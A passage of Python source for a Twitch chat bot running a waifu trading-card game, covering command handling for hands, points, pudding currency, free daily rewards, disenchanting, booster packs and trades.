logger.debug("whisper: %s, %s", str(target), message)
else:
logger.debug("message: %s, %s, %s", str(source), str(target), message)
# print("Tags: " + str(tags))
sender = str(target).lower()
channelowner = str(source).lower().replace("#", "")
# verify tags
# do nothing if twitch id is somehow missing
if 'user-id' not in tags:
return
# failsafe since display-name can (very rarely) be null for certain Twitch accounts
if 'display-name' not in tags or not tags['display-name']:
tags['display-name'] = sender
activeCommands = ["checkhand", "points", "pudding", "freewaifu", "freebie", "disenchant",
"de", "buy", "booster", "trade", "lookup", "owners", "alerts", "alert", "redeem", "wars",
"war", "vote", "donate", "incentives", "upgrade", "search", "freepacks", "freepack", "bet",
"sets", "set", "setbadge", "giveaway", "raffle", "bounty", "profile", "packspending", "godimage",
"sendpoints", "sorthand"]
userid = int(tags['user-id'])
if userid in blacklist:
if message.startswith("!") and message.split()[0][1:].lower() in activeCommands:
self.message(source, "Account banned from playing TCG. If you're seeing this without knowing why, contact TCG staff @ %s/discord" % config["siteHost"], isWhisper)
return
elif "bot" in sender:
with busyLock:
with db.cursor() as cur:
cur.execute("SELECT id, banned FROM banned_users WHERE id = %s", [userid])
banrow = cur.fetchone()
if banrow is None:
cur.execute("INSERT INTO banned_users (id, banned) VALUES(%s, 1)", [userid])
blacklist.append(userid)
if message.startswith("!") and message.split()[0][1:].lower() in activeCommands:
self.message(source, "This account appears to be a bot. If it is not, contact TCG staff @ %s/discord to have it unbanned." % config["siteHost"], isWhisper)
return
if banrow[1] > 0:
# failsafe but shouldnt happen (blacklist updated in DB but not reloaded)
if message.startswith("!") and message.split()[0][1:].lower() in activeCommands:
self.message(source, "Account banned from playing TCG. If you're seeing this without knowing why, contact TCG staff @ %s/discord" % config["siteHost"], isWhisper)
return
activitymap[sender] = 0
activitymap[channelowner] = 0
isMarathonChannel = source == config['marathonChannel'] and not isWhisper
if isMarathonChannel:
marathonActivityMap[sender] = 0
with busyLock:
with db.cursor() as cur:
# War?
if int(config["emoteWarStatus"]) == 1:
if sender not in self.emotecooldowns:
self.emotecooldowns[sender] = defaultdict(int)
for emote in emotewaremotes:
if emote in message and self.emotecooldowns[sender][emote] <= current_milli_time() - 60000:
cur.execute("UPDATE emoteWar SET `count` = `count` + 1 WHERE name = %s", [emote])
self.emotecooldowns[sender][emote] = current_milli_time()
cur.execute("SELECT name FROM users WHERE id = %s", [tags['user-id']])
user = cur.fetchone()
if user is None:
cur.execute("INSERT INTO users (id, name, points) VALUE (%s, %s, %s)",
[tags['user-id'], sender, 0])
logger.info("%s didn't have an account, created it.", tags['display-name'])
elif user[0] != sender:
logger.info("%s got a new name, changing it to: %s", user[0], sender)
cur.execute("UPDATE users SET name = %s WHERE id = %s", [sender, tags['user-id']])
self.handleNameChange(user[0], sender)
if message.startswith("!"):
parts = message.split()
command = parts[0][1:].lower()
if command in activeCommands:
with busyLock:
with db.cursor() as cur:
cur.execute(
"UPDATE users SET lastActiveTimestamp = %s, lastActiveChannel = %s WHERE id = %s",
[current_milli_time(), "$$whisper$$" if isWhisper else source, tags['user-id']])
self.do_command(command, parts[1:], target, source, tags, isWhisper=isWhisper)
def message(self, channel, message, isWhisper=False):
logger.debug("sending message %s %s %s" % (channel, message, "Y" if isWhisper else "N"))
if isWhisper:
super().message("#jtv", "/w " + str(channel).replace("#", "") + " " + str(message))
elif not silence:
super().message(channel, message)
else:
logger.debug("Message not sent as not Whisper and Silent Mode enabled")
def do_command(self, command, args, sender, channel, tags, isWhisper=False):
logger.debug("Got command: %s with arguments %s", command, str(args))
isMarathonChannel = channel == config['marathonChannel'] and not isWhisper
# temp workaround to keep old syntax valid
if command == "tokengacha":
command = "tokenshop"
args = ["gacha"] + args
if command == "as" and debugMode and sender in superadmins:
if len(args) < 2 or len(args[1]) == 0:
self.message(channel, "Usage: !as <user> <command>", isWhisper)
return
with busyLock:
with db.cursor() as cur:
cur.execute("SELECT id FROM users WHERE name = %s", [args[0]])
row = cur.fetchone()
if row is None:
self.message(channel, "User not found.")
return
userid = row[0]
self.do_command(args[1][1:].lower(), args[2:], args[0].lower(), channel,
{'display-name': args[0], 'user-id': userid, 'badges': []}, isWhisper)
return
with busyLock:
if command == config["marathonHelpCommand"] and isMarathonChannel:
self.message(channel, config["marathonHelpCommandText"], isWhisper)
return
if command == "cpu" and isMarathonChannel and booleanConfig("cpuWarActive"):
cpu = "" if len(args) < 1 else args[0].lower()
if cpu.startswith("hdn"):
cpu = cpu[3:]
if cpu in ["neptune", "noire", "blanc", "vert"]:
if tags['user-id'] in cpuVoters:
self.message(channel, "%s, you've already voted this hour!" % tags['display-name'], isWhisper)
return
with db.cursor() as cur:
cur.execute("UPDATE cpuwar SET votes = votes + 1 WHERE cpu = %s", [cpu])
formattedCpu = "HDN" + cpu[0].upper() + cpu[1:]
self.message(channel, "Registered %s's vote for %s" % (tags['display-name'], formattedCpu))
cpuVoters.append(tags['user-id'])
elif cpu != "":
self.message(channel, "Invalid choice. Valid votes are Neptune, Noire, Blanc or Vert.", isWhisper)
else:
with db.cursor() as cur:
cur.execute("SELECT cpu, votes FROM cpuwar ORDER BY votes DESC, cpu ASC")
currentVotes = cur.fetchall()
warStrings = ["%s - %d votes" % ("HDN" + row[0][0].upper() + row[0][1:], row[1]) for row in currentVotes]
self.message(channel, "Current results: %s" % ", ".join(warStrings), isWhisper)
if command == "quit" and sender in superadmins:
logger.info("Quitting from admin command.")
pool.disconnect(client=self, expected=True)
# sys.exit(0)
return
if command == "checkhand":
# print("Checking hand for " + sender)
cards = getHand(tags['user-id'])
if len(cards) == 0:
self.message(channel,
"%s, you don't have any waifus! Get your first with !freebie" % tags[
'display-name'], isWhisper=isWhisper)
return
currentData = currentCards(tags['user-id'], True)
limit = handLimit(tags['user-id'])
dropLink = "%s/hand?user=%s" % (config["siteHost"], sender)
msgArgs = {"user": tags['display-name'], "limit": limit, "curr": currentData['hand'],
"bounties": currentData['bounties'], "link": dropLink}
# verbose mode if it's a whisper or they request it
if len(args) > 0 and args[0].lower() == "verbose":
if isWhisper or followsme(tags['user-id']):
whisperChannel = "#%s" % sender
if currentData['bounties'] > 0:
self.message(whisperChannel,
"{user}, you have {curr} waifus, {bounties} bounties and {limit} total spaces. {link}".format(
**msgArgs), True)
else:
self.message(whisperChannel,
"{user}, you have {curr} waifus and {limit} total spaces. {link}".format(
**msgArgs), True)
messages = ["Your current hand is: "]
for row in cards:
waifumsg = getWaifuRepresentationString(row['waifuid'], cardrarity=row[
'rarity']) + ' from {series} - {image} (Card ID {cardid}); '.format(**row)
if len(messages[-1]) + len(waifumsg) > 400:
messages.append(waifumsg)
else:
messages[-1] += waifumsg
for message in messages:
self.message(whisperChannel, message, True)
elif not isWhisper:
self.message(channel,
"%s, to use verbose checkhand, follow the bot! Follow it and try again." %
tags['display-name'])
else:
if currentData['bounties'] > 0:
self.message(channel,
"{user}, you have {curr} waifus, {bounties} bounties and {limit} total spaces. {link}".format(
**msgArgs), isWhisper)
else:
self.message(channel,
"{user}, you have {curr} waifus and {limit} total spaces. {link}".format(
**msgArgs), isWhisper)
return
if command == "points":
with db.cursor() as cur:
cur.execute("SELECT points FROM users WHERE id = %s", [tags['user-id']])
points = cur.fetchone()[0]
pudding = sum(getPuddingBalance(tags['user-id']))
self.message(channel, "%s, you have %d points and %d pudding!" % (tags['display-name'], points, pudding), isWhisper)
return
if command == "pudding":
subcmd = "" if len(args) < 1 else args[0].lower()
if subcmd == "booster" or subcmd == "buy":
if len(args) < 2:
self.message(channel, "Usage: !pudding " + subcmd + " <name>", isWhisper)
return
# check that the pack is actually buyable
truename = boostername = args[1].lower()
mega = False
if boostername.startswith("mega"):
truename = boostername[4:]
mega = True
with db.cursor() as cur:
cur.execute("SELECT name, cost, canMega FROM boosters WHERE name = %s AND buyable = 1", [truename])
booster = cur.fetchone()
if booster is None or (mega and booster[2] == 0):
self.message(channel, "Invalid booster specified.", isWhisper)
return
# can they actually open it?
cur.execute("SELECT COUNT(*) FROM boosters_opened WHERE userid = %s AND status = 'open'",
[tags['user-id']])
boosteropen = cur.fetchone()[0] or 0
if boosteropen > 0:
self.message(channel,
"%s, you have an open booster already! !booster show to check it." %
tags['display-name'], isWhisper)
return
cost = math.ceil(int(booster[1])/int(config["puddingExchangeRate"]))*(5 if mega else 1)
if not hasPudding(tags['user-id'], cost):
self.message(channel, "%s, you can't afford a %s booster. They cost %d pudding." % (tags['display-name'], boostername, cost), isWhisper)
return
takePudding(tags['user-id'], cost)
try:
openBooster(self, tags['user-id'], sender, tags['display-name'], channel, isWhisper, truename, False, mega)
if checkHandUpgrade(tags['user-id']):
messageForHandUpgrade(tags['user-id'], tags['display-name'], self, channel, isWhisper)
self.message(channel, "%s, you open a %s booster for %d pudding: %s/booster?user=%s" % (tags['display-name'], boostername, cost, config["siteHost"], sender), isWhisper)
except InvalidBoosterException:
discordbody = {
"username": "WTCG Admin",
"content" : "Booster type %s is broken, please fix it." % booster[0]
}
threading.Thread(target=sendAdminDiscordAlert, args=(discordbody,)).start()
self.message(channel,
"There was an error processing your booster, please try again later.",
isWhisper)
return
elif subcmd == "list":
with db.cursor() as cur:
cur.execute("SELECT name, cost FROM boosters WHERE listed = 1 AND buyable = 1 ORDER BY sortIndex ASC")
boosters = cur.fetchall()
boosterInfo = ", ".join("%s / %d pudding" % (row[0], math.ceil(int(row[1])/int(config["puddingExchangeRate"]))) for row in boosters)
self.message(channel, "Current buyable packs: %s. !pudding booster <name> to buy a booster with pudding." % boosterInfo, isWhisper)
elif subcmd == "topup":
if len(args) < 2:
self.message(channel, "Usage: !pudding topup <amount>", isWhisper)
return
try:
amount = int(args[1])
except ValueError:
self.message(channel, "Usage: !pudding topup <amount>", isWhisper)
return
if amount <= 0:
self.message(channel, "Invalid amount of pudding to buy.", isWhisper)
return
pointsCost = amount * int(config["puddingExchangeRate"])
if not hasPoints(tags['user-id'], pointsCost):
self.message(channel, "%s, you don't have enough points to buy %d pudding. You need %d." % (tags['display-name'], amount, pointsCost), isWhisper)
return
addPoints(tags['user-id'], -pointsCost)
addPudding(tags['user-id'], amount)
newBalance = sum(getPuddingBalance(tags['user-id']))
msgArgs = (tags['display-name'], pointsCost, amount, newBalance)
self.message(channel, "%s, you spent %d points to buy %d extra pudding. You now have %d total pudding (!pudding for full details)" % msgArgs, isWhisper)
else:
# base: show pudding balance broken down
pudding = getPuddingBalance(tags['user-id'])
if sum(pudding) == 0:
self.message(channel, "%s, you don't currently have any pudding. You can earn some by participating in bets or completing sets." % tags['display-name'], isWhisper)
else:
msgArgs = (tags['display-name'], sum(pudding), pudding[0], pudding[1], pudding[2], config["puddingExchangeRate"])
self.message(channel, "%s, you have %d total pudding: %d earned this month, %d earned last month, %d expiring soon. !pudding list to see what boosters you can buy, !pudding booster <name> to buy a booster with pudding. !pudding topup <amount> to buy extra pudding (%s points each)" % msgArgs, isWhisper)
return
if command == "freewaifu" or command == "freebie":
# print("Checking free waifu egliability for " + str(sender))
with db.cursor() as cur:
cur.execute("SELECT lastFree, rewardSeqSeed, rewardSeqIndex FROM users WHERE id = %s", [tags['user-id']])
res = cur.fetchone()
nextFree = 79200000 + int(res[0])
if nextFree > current_milli_time():
datestring = formatTimeDelta(nextFree - current_milli_time(), False)
self.message(channel,
str(tags[
'display-name']) + ", you need to wait {0} for your next free drop!".format(
datestring), isWhisper=isWhisper)
return
cur.execute("SELECT COUNT(*) FROM boosters_opened WHERE userid = %s AND status = 'open'", [tags['user-id']])
hasPack = cur.fetchone()[0] > 0
spaceInHand = currentCards(tags['user-id']) < handLimit(tags['user-id'])
freeData = getRewardsMetadata()
seed = res[1]
index = res[2]
if seed is None or index >= freeData[0]:
seed = generateRewardsSeed(*freeData)
index = 0
# retrieve their reward for this time
generator = random.Random(seed)
seq = [x for x in range(freeData[0])]
generator.shuffle(seq)
rewardNum = seq[index]
if rewardNum >= freeData[1]:
# not good reward
lookup = [0, rewardNum - freeData[1]]
else:
# good
lookup = [1, rewardNum]
cur.execute("SELECT points, waifuid, waifu_rarity, boostername FROM free_rewards WHERE `is_good` = %s AND `index` = %s", lookup)
rewardInfo = cur.fetchone()
if rewardInfo is None:
discordbody = {
"username": "WTCG Admin",
"content" : "The free reward database is misconfigured, please fix it."
}
threading.Thread(target=sendAdminDiscordAlert, args=(discordbody,)).start()
self.message(channel, "Could not retrieve your free reward, try again later.", isWhisper)
return
# only one of the latter three rewards is allowed to be filled in, and there needs to be at least one reward.
cardRewardCount = sum([(1 if rewardInfo[n] is not None else 0) for n in range(1, 4)])
ovrRewardCount = sum([(1 if rewardInfo[n] is not None else 0) for n in range(4)])
if cardRewardCount > 1 or ovrRewardCount == 0:
discordbody = {
"username": "WTCG Admin",
"content" : "The free reward database is misconfigured, please fix it."
}
threading.Thread(target=sendAdminDiscordAlert, args=(discordbody,)).start()
self.message(channel, "Could not retrieve your free reward, try again later.", isWhisper)
return
# can they take the reward at the current time?
if (rewardInfo[1] is not None or rewardInfo[2] is not None) and hasPack and not spaceInHand:
# save seed in progress so it doesn't reset if this happens at the end of one
cur.execute("UPDATE users SET rewardSeqSeed = %s, rewardSeqIndex = %s WHERE id = %s", [seed, index, tags['user-id']])
self.message(channel, "%s, your hand is full and you have a booster open!" % tags['display-name'], isWhisper)
return
# if we made it this far they can receive it. process it
if rewardInfo[0] is not None:
addPoints(tags['user-id'], rewardInfo[0])
if cardRewardCount == 0:
self.message(channel, "%s, you got your daily free reward: %d points!" % (tags['display-name'], rewardInfo[0]), isWhisper)
pointsPrefix = ("%d points and " % rewardInfo[0]) if rewardInfo[0] is not None else ""
if rewardInfo[1] is not None or rewardInfo[2] is not None:
if rewardInfo[1] is not None:
wid = rewardInfo[1]
else:
wid = dropCard(rarity=rewardInfo[2], bannedCards=getUniqueCards(tags['user-id']))
row = getWaifuById(wid)
recordPullMetrics(row['id'])
if row['base_rarity'] >= int(config["drawAlertMinimumRarity"]):
threading.Thread(target=sendDrawAlert, args=(channel, row, str(tags["display-name"]))).start()
boosterid = None
if not spaceInHand:
boosterid = addBooster(tags['user-id'], 'freebie', 0, 'open', 0, channel, isWhisper)
addCard(tags['user-id'], row['id'], 'freebie', boosterid)
if spaceInHand:
attemptPromotions(row['id'])
droplink = config["siteHost"] + "/booster?user=" + sender
msgArgs = {"username": tags['display-name'], "id": row['id'],
"rarity": config["rarity%dName" % row['base_rarity']],
"name": row['name'], "series": row['series'],
"link": row['image'] if spaceInHand else "",
"pack": " ( %s )" % droplink if not spaceInHand else "",
"points": pointsPrefix}
self.message(channel, "{username}, you got your daily free reward: {points}[{id}][{rarity}] {name} from {series} - {link}{pack}".format(**msgArgs), isWhisper)
if rewardInfo[3] is not None:
if hasPack:
# send the pack to freepacks
giveFreeBooster(tags['user-id'], rewardInfo[3])
self.message(channel, "%s, you got your daily free reward: %sa %s booster (sent to !freepacks)" % (tags['display-name'], pointsPrefix, rewardInfo[3]), isWhisper)
else:
try:
packid = openBooster(self, tags['user-id'], sender, tags['display-name'], channel, isWhisper, rewardInfo[3], False)
if checkHandUpgrade(tags['user-id']):
messageForHandUpgrade(tags['user-id'], tags['display-name'], self, channel, isWhisper)
self.message(channel, "%s, you got your daily free reward: %sa %s booster - %s/booster?user=%s" % (tags['display-name'], pointsPrefix, rewardInfo[3], config['siteHost'], sender), isWhisper)
except InvalidBoosterException:
discordbody = {
"username": "WTCG Admin",
"content" : "The free reward database is misconfigured, please fix it."
}
threading.Thread(target=sendAdminDiscordAlert, args=(discordbody,)).start()
self.message(channel, "Could not retrieve your free reward, try again later.", isWhisper)
return
cur.execute("UPDATE users SET lastFree = %s, rewardSeqSeed = %s, rewardSeqIndex = %s WHERE id = %s", [current_milli_time(), seed, index + 1, tags['user-id']])
return
if command == "disenchant" or command == "de":
if len(args) == 0 or (len(args) == 1 and len(args[0]) == 0):
self.message(channel, "Usage: !disenchant <list of IDs>", isWhisper=isWhisper)
return
# check for confirmation
hasConfirmed = False
if args[-1].lower() == "yes":
hasConfirmed = True
args = args[:-1]
disenchants = []
dontHave = []
hand = getHand(tags['user-id'])
disenchantingSpecial = False
godRarity = int(config["numNormalRarities"]) - 1
for arg in args:
# handle disenchanting
try:
deTarget = parseHandCardSpecifier(hand, arg)
if deTarget in disenchants:
self.message(channel, "You can't disenchant the same waifu twice at once!", isWhisper)
return
if deTarget['rarity'] >= int(config["numNormalRarities"]) and not hasConfirmed:
self.message(channel,
"%s, you are trying to disenchant one or more special waifus! Special waifus do not take up any hand space and disenchant for 0 points. If you are sure you want to do this, append \" yes\" to the end of your command." %
tags['display-name'], isWhisper)
return
if deTarget['rarity'] >= int(
config["disenchantRequireConfirmationRarity"]) and not hasConfirmed:
confirmRarityName = config["rarity%sName" % config["disenchantRequireConfirmationRarity"]]
self.message(channel,
"%s, you are trying to disenchant one or more waifus of %s rarity or higher! If you are sure you want to do this, append \" yes\" to the end of your command." % (
tags['display-name'], confirmRarityName), isWhisper)
return
if deTarget['rarity'] != deTarget['base_rarity'] and not hasConfirmed:
self.message(channel,
"%s, you are trying to disenchant one or more promoted waifus! If you are sure you want to do this, append \" yes\" to the end of your command." %
tags['display-name'], isWhisper)
return
disenchants.append(deTarget)
except CardNotInHandException:
dontHave.append(arg)
except AmbiguousWaifuException:
self.message(channel,
"You have more than one copy of waifu %s in your hand. Please specify a card ID instead. You can find your card IDs using !checkhand" % (
arg), isWhisper)
return
except ValueError:
self.message(channel, "Could not decipher one or more of the waifu/card IDs you provided.",
isWhisper)
return
if len(dontHave) > 0:
if len(dontHave) == 1:
self.message(channel, "You don't own waifu %s." % dontHave[0], isWhisper)
else:
self.message(channel,
"You don't own the following waifus: %s" % ", ".join([id for id in dontHave]),
isWhisper)
return
# handle disenchants appropriately
pointsGain = 0
ordersFilled = 0
checkPromos = []
for row in disenchants:
if row['waifuid'] not in checkPromos:
checkPromos.append(row['waifuid'])
baseValue = int(config["rarity" + str(row['rarity']) + "Value"])
gain = disenchant(self, row['cardid'])
if row['base_rarity'] >= int(config["numNormalRarities"]):
disenchantingSpecial = True
pointsGain += gain
if gain > baseValue:
ordersFilled += 1
elif row['rarity'] >= int(config["disenchantAlertMinimumRarity"]):
# valuable waifu disenchanted
waifuData = getWaifuById(row['waifuid'])
waifuData['base_rarity'] = row['rarity'] # cheat to make it show any promoted rarity override
threading.Thread(target=sendDisenchantAlert,
args=(channel, waifuData, tags["display-name"])).start()
if row['rarity'] == godRarity:
# check image change
with db.cursor() as cur:
cur.execute("UPDATE godimage_requests SET state='cancelled' WHERE requesterid = %s AND cardid = %s AND state = 'pending'", [tags['user-id'], row['cardid']])
if cur.rowcount > 0:
# request was cancelled
waifuData = getWaifuById(row['waifuid'])
self.message("#%s" % sender, "Your image change request for [%d] %s was cancelled since you disenchanted it." % (row['waifuid'], waifuData['name']), True)
attemptPromotions(*checkPromos)
addPoints(tags['user-id'], pointsGain)
if disenchantingSpecial:
checkFavouriteValidity(tags['user-id'])
if len(disenchants) == 1:
buytext = " (bounty filled)" if ordersFilled > 0 else ""
self.message(channel, "Successfully disenchanted waifu %d%s. %s gained %d points" % (
disenchants[0]['waifuid'], buytext, str(tags['display-name']), pointsGain), isWhisper=isWhisper)
else:
buytext = " (%d bounties filled)" % ordersFilled if ordersFilled > 0 else ""
self.message(channel,
"Successfully disenchanted %d waifus%s. Added %d points to %s's account" % (
len(disenchants), buytext, pointsGain, str(tags['display-name'])),
isWhisper=isWhisper)
return
if command == "giveme":
self.message(channel, "No.", isWhisper=isWhisper)
return
if command == "buy":
if len(args) != 1:
if len(args) > 0 and args[0].lower() == "booster":
self.message(channel, "%s, did you mean !booster buy?" % tags['display-name'], isWhisper)
else:
self.message(channel, "Usage: !buy <rarity> (So !buy uncommon for an uncommon)",
isWhisper=isWhisper)
return
if currentCards(tags['user-id']) >= handLimit(tags['user-id']):
self.message(channel,
"{sender}, you have too many cards to buy one! !disenchant some or upgrade your hand!".format(
sender=str(tags['display-name'])), isWhisper=isWhisper)
return
try:
rarity = parseRarity(args[0])
except Exception:
self.message(channel, "Unknown rarity. Usage: !buy <rarity> (So !buy uncommon for an uncommon)",
isWhisper=isWhisper)
return
price = int(config["rarity" + str(rarity) + "BuyPrice"])
if rarity >= int(config["numNormalRarities"]) or price <= 0:
self.message(channel, "You can't buy that rarity of waifu.", isWhisper=isWhisper)
return
if not hasPoints(tags['user-id'], price):
self.message(channel, "You do not have enough points to buy a " + str(
config["rarity" + str(rarity) + "Name"]) + " waifu. You need " + str(price) + " points.",
isWhisper=isWhisper)
return
chosenWaifu = dropCard(rarity=rarity, allowDowngrades=False,
bannedCards=getUniqueCards(tags['user-id']))
if chosenWaifu is not None:
addPoints(tags['user-id'], 0 - price)
row = getWaifuById(chosenWaifu)
self.message(channel, str(
tags[
'display-name']) + ', you bought a new Waifu for {price} points: [{id}][{rarity}] {name} from {series} - {link}'.format(
id=str(row['id']), rarity=config["rarity" + str(row['base_rarity']) + "Name"], name=row['name'],
series=row['series'],
link=row['image'], price=str(price)), isWhisper=isWhisper)
recordPullMetrics(row['id'])
addCard(tags['user-id'], row['id'], 'buy')
if row['base_rarity'] >= int(config["drawAlertMinimumRarity"]):
threading.Thread(target=sendDrawAlert, args=(channel, row, str(tags["display-name"]))).start()
attemptPromotions(row['id'])
return
else:
self.message(channel, "You can't buy a %s waifu right now. Try again later." % config[
"rarity" + str(rarity) + "Name"], isWhisper)
return
if command == "booster":
if len(args) < 1:
self.message(channel,
"Usage: !booster list OR !booster buy <%s> OR !booster select <take/disenchant> (for each waifu) OR !booster show" % visiblepacks,
isWhisper=isWhisper)
return
# check for confirmation
hasConfirmed = False
if args[-1].lower() == "yes":
hasConfirmed = True
args = args[:-1]
cmd = args[0].lower()
# even more shorthand shortcut for disenchant all
if cmd == "trash":
cmd = "select"
args = ["select", "deall"]
cur = db.cursor()
currBooster = getOpenBooster(tags['user-id'])
if (cmd == "show" or cmd == "select") and currBooster is None:
self.message(channel, tags[
'display-name'] + ", you do not have an open booster. Buy one using !booster buy <%s>" % visiblepacks,
isWhisper=isWhisper)
cur.close()
return
if cmd == "show":
if len(args) > 1 and args[1].lower() == "verbose":
# TODO
pass
else:
droplink = config["siteHost"] + "/booster?user=" + sender
self.message(channel, "{user}, your current open booster pack: {droplink}".format(
user=tags['display-name'], droplink=droplink), isWhisper=isWhisper)
cur.close()
return
if cmd == "select":
# check for shorthand syntax
if len(args) == 2:
if args[1].lower() == 'deall' or args[1].lower() == 'disenchantall':
selectArgs = ["disenchant"] * len(currBooster['cards'])
elif args[1].lower() == 'keep' or args[1].lower() == 'disenchant':
selectArgs = args[1:]
else:
selectArgs = []
for letter in args[1].lower():
if letter != 'd' and letter != 'k':
self.message(channel,
"When using shorthand booster syntax, please only use the letters d and k.",
isWhisper=isWhisper)
cur.close()
return
elif letter == 'd':
selectArgs.append("disenchant")
else:
selectArgs.append("keep")
else:
selectArgs = args[1:]
if len(selectArgs) != len(currBooster['cards']):
self.message(channel, "You did not specify the correct amount of keep/disenchant.",
isWhisper=isWhisper)
cur.close()
return
for arg in selectArgs:
if not (arg.lower() == "keep" or arg.lower() == "disenchant"):
self.message(channel,
"Sorry, but " + arg.lower() + " is not a valid option. Use keep or disenchant",
isWhisper=isWhisper)
cur.close()
return
# check card info for rarities etc
keepCards = []
deCards = []
keepingCount = 0
for i in range(len(currBooster['cards'])):
card = currBooster['cards'][i]
if selectArgs[i].lower() == "keep":
keepCards.append(card)
if card['base_rarity'] < int(config["numNormalRarities"]):
keepingCount += 1
else:
# disenchant
if card['base_rarity'] >= int(
config["disenchantRequireConfirmationRarity"]) and not hasConfirmed:
confirmRarityName = config[
"rarity%sName" % config["disenchantRequireConfirmationRarity"]]
self.message(channel,
"%s, you are trying to disenchant one or more waifus of %s rarity or higher! If you are sure you want to do this, append \" yes\" to the end of your command." % (
tags['display-name'], confirmRarityName), isWhisper)
return
deCards.append(card)
if keepingCount + currentCards(tags['user-id']) > handLimit(tags['user-id']) and keepingCount != 0:
self.message(channel, "You can't keep that many waifus! !disenchant some!", isWhisper=isWhisper)
cur.close()
return
trash = len(keepCards) == 0
# if we made it through the whole pack without tripping confirmation, we can actually do it now
for card in keepCards:
updateCard(card['cardid'], {"boosterid": None})
gottenpoints = 0
ordersFilled = 0
for card in deCards:
baseValue = int(config["rarity" + str(card['base_rarity']) + "Value"])
gain = disenchant(self, card['cardid'])
gottenpoints += gain
if gain > baseValue:
ordersFilled += 1
elif card['base_rarity'] >= int(config["disenchantAlertMinimumRarity"]):
# valuable waifu being disenchanted
threading.Thread(target=sendDisenchantAlert,
args=(channel, getWaifuById(card['waifuid']), str(tags["display-name"]))).start()
cardIDs = [row['waifuid'] for row in currBooster['cards']]
attemptPromotions(*cardIDs)
addPoints(tags['user-id'], gottenpoints)
# compile the message to be sent in chat
response = "You %s your booster pack%s" % (("trash", "") if trash else ("take"," and: "))
if len(keepCards) > 0:
response += " keep " + ', '.join(str(x['waifuid']) for x in keepCards) + ";"
if len(deCards) > 0 and not trash:
response += " disenchant the rest"
if ordersFilled > 0:
response += " (filling %d bounties);" % ordersFilled
elif len(deCards) > 0:
response += ";"
self.message(channel, response + ((" netting " + str(gottenpoints) + " points.") if gottenpoints>0 else ""),
isWhisper=isWhisper)
cur.execute("UPDATE boosters_opened SET status = 'closed', updated = %s WHERE id = %s",
[current_milli_time(), currBooster['id']])
cur.close()
return
if cmd == "list":
with db.cursor() as cur:
cur.execute("SELECT name, cost FROM boosters WHERE listed = 1 AND buyable = 1 ORDER BY sortIndex ASC")
boosters = cur.fetchall()
boosterInfo = ", ".join("%s / %d points" % (row[0], row[1]) for row in boosters)
self.message(channel, "Current buyable packs: %s. !booster buy <name> to buy a booster with points." % boosterInfo, isWhisper)
return
if cmd == "buy":
if currBooster is not None:
self.message(channel,
"You already have an open booster. Close it first!",
isWhisper=isWhisper)
cur.close()
return
if len(args) < 2:
self.message(channel, "Usage: !booster buy <%s>" % visiblepacks, isWhisper=isWhisper)
cur.close()
return
truepackname = packname = args[1].lower()
mega = False
if packname.startswith("mega"):
truepackname = packname[4:]
mega = True
try:
openBooster(self, tags['user-id'], sender, tags['display-name'], channel, isWhisper, truepackname, True, mega)
if checkHandUpgrade(tags['user-id']):
messageForHandUpgrade(tags['user-id'], tags['display-name'], self, channel, isWhisper)
droplink = config["siteHost"] + "/booster?user=" + sender
self.message(channel, "{user}, you open a {type} booster: {droplink}".format(
user=tags['display-name'], type=packname, droplink=droplink), isWhisper=isWhisper)
except InvalidBoosterException:
self.message(channel, "Invalid booster type. Packs available right now: %s." % visiblepacks,
isWhisper=isWhisper)
except CantAffordBoosterException as exc:
self.message(channel,
"{user}, you don't have enough points for a {name} pack. You need {points}.".format(
user=tags['display-name'], name=packname, points=exc.cost),
isWhisper=isWhisper)
cur.close()
return
if command == "trade":
ourid = int(tags['user-id'])
with db.cursor() as cur:
# expire old trades
currTime = current_milli_time()
cur.execute(
"UPDATE trades SET status = 'expired', updated = %s WHERE status = 'open' AND created <= %s",
[currTime, currTime - 86400000])
if len(args) < 1 or (len(args) < 2 and args[0].lower() != "list"):
self.message(channel,
"Usage: !trade <check/accept/decline/cancel> <user> OR !trade <user> <have> <want> OR !trade list",
isWhisper=isWhisper)
return
subarg = args[0].lower()
if subarg == "list":
cur.execute("SELECT users.name FROM trades JOIN users ON trades.toid = users.id WHERE trades.fromid = %s AND trades.status = 'open'", [ourid])
sentTradesTo = [row[0] for row in cur.fetchall()]
cur.execute("SELECT users.name FROM trades JOIN users ON trades.fromid = users.id WHERE trades.toid = %s AND trades.status = 'open'", [ourid])
recvdTradesFrom = [row[0] for row in cur.fetchall()]
if len(sentTradesTo) == 0 and len(recvdTradesFrom) == 0:
self.message(channel, "You have no unresolved trades right now.", isWhisper)
else:
numTrades = len(sentTradesTo) + len(recvdTradesFrom)
parts = []
if len(sentTradesTo) > 0:
parts.append("Sent trades to: %s." % (", ".join(sentTradesTo)))
if len(recvdTradesFrom) > 0:
parts.append("Received trades from: %s." % (", ".join(recvdTradesFrom)))
self.message(channel, "%s, you have %d pending trade%s. %s"%(tags['display-name'], numTrades, "s" if numTrades > 1 else "", " ".join(parts)), isWhisper)
return
if subarg in ["check", "accept", "decline", "cancel"]:
otherparty = args[1].lower()
cur.execute("SELECT id FROM users WHERE name = %s", [otherparty])
otheridrow = cur.fetchone()
if otheridrow is None:
self.message(channel, "I don't recognize that username.", isWhisper=isWhisper)
return
otherid = int(otheridrow[0])
if ourid == otherid:
self.message(channel, "You cannot trade with yourself.", isWhisper)
return
if subarg == "cancel":
# different case here, since the trade is FROM us
cur.execute("SELECT id FROM trades WHERE fromid = %s AND toid = %s AND status = 'open' LIMIT 1", [ourid, otherid])
trade = cur.fetchone()
if trade is None:
self.message(channel, "You do not have a pending trade with %s. Send one with !trade %s <have> <want>" % (otherparty, otherparty), isWhisper)
else:
cur.execute("UPDATE trades SET status = 'cancelled', updated = %s WHERE id = %s", [current_milli_time(), trade[0]])
self.message(channel, "You cancelled your pending trade with %s." % otherparty, isWhisper)
sendPushNotification([otherid], {'type': 'tradeCancelled', 'image': 'https://lowee.de',
'message': "{otherplayer} has cancelled the trade with you.".format(
otherplayer=tags['display-name']),
'openurl': 'https://twitch.tv/nepnepbot'})
return
# look for trade row
cur.execute(
"SELECT id, want, have, points, payup FROM trades WHERE fromid = %s AND toid = %s AND status = 'open' LIMIT 1",
[otherid, ourid])
trade = cur.fetchone()
if trade is None:
self.message(channel,
otherparty + " did not send you a trade. Send one with !trade " + otherparty + " <have> <want>",
isWhisper=isWhisper)
return
want = getCard(trade[1])
have = getCard(trade[2])
tradepoints = trade[3]
payup = trade[4]
# check that cards are still in place and owned by us
if want['userid'] is None or want['userid'] != ourid or have['userid'] is None or have['userid'] != otherid:
